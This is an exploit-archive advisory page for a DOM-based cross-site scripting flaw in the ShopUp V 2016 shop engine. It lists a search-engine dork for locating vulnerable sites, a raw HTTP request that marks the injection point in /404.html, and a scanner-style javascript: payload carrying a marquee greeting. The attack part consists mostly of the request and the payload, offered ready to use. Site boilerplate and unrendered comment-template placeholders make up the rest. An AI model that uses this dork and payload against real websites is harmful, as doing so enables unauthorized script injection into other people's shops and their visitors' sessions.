ShopUp V 2016 - DOM-based cross site scripting

2019.01.08

Salvatrucha (DZ)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Engine by Shopup.com"

Exploit title : 
Exploit author : Heisenberg
software link : http://www.shopup.com
version : *
dork : intext:"Engine by Shopup.com"
Tested on : Win7_64
GET /404.html[%Inject_Here%] HTTP/1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*



>Source : window.location
>Location : http://target/404.html
>Exploit : target/404.html[%Inject_Here%]
>Use Payload/Injection : ?wvstest=javascript:domxssExecutionSink(1,"%27%5C"><xsstag><marquee><h>to my M7 and others F you are my stars it's great honor being with you wish you the best</h></marquee>)

References:

Salvatrucha

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ShopUp V 2016 - DOM-based cross site scripting

Dork: intext:"Engine by Shopup.com"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.